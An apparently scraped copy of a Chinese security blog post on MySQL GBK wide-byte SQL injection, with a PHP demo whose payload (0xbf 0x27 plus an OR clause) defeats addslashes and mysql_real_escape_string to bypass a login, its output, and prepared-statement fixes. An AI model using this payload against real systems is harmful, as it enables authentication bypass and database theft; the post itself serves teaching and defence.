0

Mysql宽字节注入

 2 years ago
source link: https://3wapp.github.io/WebSecurity/mysql%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

1. mysql 宽字节注入

只要低位的范围中含有0x5c的编码,就可以进行宽字符注入

2. 绕过addslasher和mysql_real_escape_string(Trick)

在MYSQL5.5.37-log下该Trick已经被修复了

demo as follow:

  • mysql
mysql> create database test_gbk default charset GBK;
Query OK, 1 row affected (0.00 sec)

mysql> use test_gbk;
Database changed

mysql> CREATE TABLE users (  
    username VARCHAR(32) CHARACTER SET GBK,  
    password VARCHAR(32) CHARACTER SET GBK,  
    PRIMARY KEY (username)  
);
Query OK, 0 rows affected (0.53 sec)

mysql> insert into users SET username='t1', password='t123456';  
Query OK, 1 row affected (0.01 sec)  

mysql> insert into users SET username='t2', password='t223456';  
Query OK, 1 row affected (0.01 sec)

mysql> insert into users SET username='t3', password='t33456';  
Query OK, 1 row affected (0.01 sec)

<?php  
echo "PHP version: ".PHP_VERSION."\n";  

# change as yours  
mysql_connect('servername','username','password');  

mysql_select_db("test_gbk");  
mysql_query("SET NAMES GBK");  

$_POST['username'] = chr(0xbf).chr(0x27).' OR username = username /*';  
$_POST['password'] = 'guess';  

$username = addslashes($_POST['username']);  
$password = addslashes($_POST['password']);  
$sql = "SELECT * FROM  users WHERE  username = '$username' AND password = '$password'";  
$result = mysql_query($sql) or trigger_error(mysql_error().$sql);  

var_dump(mysql_num_rows($result));  
var_dump(mysql_client_encoding());  

$username = mysql_real_escape_string($_POST['username']);  
$password = mysql_real_escape_string($_POST['password']);  
$sql = "SELECT * FROM  users WHERE  username = '$username' AND password = '$password'";  
$result = mysql_query($sql) or trigger_error(mysql_error().$sql);  

var_dump(mysql_num_rows($result));  
var_dump(mysql_client_encoding());  

mysql_set_charset("GBK");  
$username = mysql_real_escape_string($_POST['username']);  
$password = mysql_real_escape_string($_POST['password']);  
$sql = "SELECT * FROM  users WHERE  username = '$username' AND password = '$password'";  
$result = mysql_query($sql) or trigger_error(mysql_error().$sql);  

var_dump(mysql_num_rows($result));  
var_dump(mysql_client_encoding());

$php test_gbk.php

PHP version: 5.2.5  
int(3)  
string(6) "latin1"  
int(3)  
string(6) "latin1"  
int(0)  
string(3) "gbk"

使用addslashes还是mysql_real_escape_string,我都可以利用编码的漏洞来实现输入任意密码就能登录服务器的注入攻击!!!!

  • 第一种, addslashes() 在Mysql配置为GBK时就可以触发漏洞
  • 第二种, mysql_real_escape_string() 是在不知 道字符集的情况下用默认字符集处理产生漏洞

  • 第三种, 设置了连接字符集, mysql_real_escape_string能使用正确的字符集转义,这样就能防编码问题的注入了

使用拥有Prepared Statement机制的PDO和MYSQLi来代替mysql_query(注:mysql_query自 PHP 5.5.0 起已废弃,并在将来会被移除):

$pdo = new PDO('mysql:dbname=dbtest;host=127.0.0.1;charset=utf8', 'user', 'pass');  

$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);  
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);  
$stmt = $pdo->prepare('SELECT * FROM employees WHERE name = :name');  
$stmt->execute(array('name' => $name));  

foreach ($stmt as $row) {  
    // do something with $row  
}

MYSQLi:

$stmt = $dbConnection->prepare('SELECT * FROM employees WHERE name = ?');  
$stmt->bind_param('s', $name);  

$stmt->execute();  

$result = $stmt->get_result();  
while ($row = $result->fetch_assoc()) {  
    // do something with $row  
}

report

Recommend

  • 5
    • www.wooyun.org 6 years ago
    • Cache

    MySql注入科普 | WooYun知识库

    MySql注入科普 瞌睡龙 ·...

  • 13
    • www.wooyun.org 6 years ago
    • Cache

    Mysql报错注入原理分析(count()、rand()、group by) | WooYun知识库

    Mysql报错注入原理分析(count()、rand()、group by) T-Safe...

  • 13
    • www.wooyun.org 6 years ago
    • Cache

    MySQL注入技巧 | WooYun知识库

    MySQL注入技巧 Utopia ·...

  • 26
    • www.tuicool.com 4 years ago
    • Cache

    从宽字节注入认识PDO的原理和正确使用

    前言 随着数据库参数化查询的方式越来越普遍,SQL注入漏洞较之于以前也大大减少,而PDO作为php中最典型的预编译查询方式,使用越来越广泛。 众所周知,PDO是php中防止SQL注入最好的方式,但并不是100%杜绝SQL注入的方...

  • 4
    • blog.spoock.com 3 years ago
    • Cache

    MySQL偏门注入

    工作之后,目前工作内容就是写代码和研究Linux内核相关的知识,已经很少研究有关SQL注入等相关知识了。这篇文章是最近在整理自己电脑文件时发现的。与其藏在角落里,还不如和大家一起分享下。由于时间过于久远,也无法确认是不是已经有人已经分享过了。

  • 0
    • y4er.com 3 years ago
    • Cache

    MySQL 注入学习

    3 min readMySQL 注入学习2019-04-30系统学习MySQL注入,记下笔记。字符串相关函数用法left(a,b)从左侧截取a的前b位substr(a,b,c)从b位置开始,截取字符串a的c长度mid(a,b,c)同substrascii()将某个字符转换为ascii值ord()同ascii函数...

  • 7
    • blogread.cn 3 years ago
    • Cache

    MySQL防范SQL注入风险

       在MySQL里,如何识别并且避免发生SQL注入风险1、关于SQL注入    互联网很危险,信息及数据安全很重要,SQL注入是最常见的入侵手段之一,其技术门槛低、成本低、收益大,颇受各层次的黑客们所青睐。    一...

  • 2
    • blue-bird1.github.io 2 years ago
    • Cache

    Mysql 储存过程注入

    May 7, 2019Mysql 储存过程注入Mysql 储存过程注入mysql有着储存过程这个功能, 这次作者刚好遇到注入点在调用储存过程的sql注入.mysql可以通过以下语句创建一个储存过程

  • 2
    • alisitaweb.github.io 2 years ago
    • Cache

    MySQL 一些注入技巧

    总结一下mysql中用的到的技巧 常量:true,false,null,\N,current_timestamp变量:@myvar:=1 系统变量:@@version,@@datadir….. 常用函数:v...

  • 4
    • alisitaweb.github.io 2 years ago
    • Cache

    MySQL False 注入姿势学习

    原文链接 0x01 False Injection首先是看了文章之后知道了一个MySQL的特性 select * from user where username=0;

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK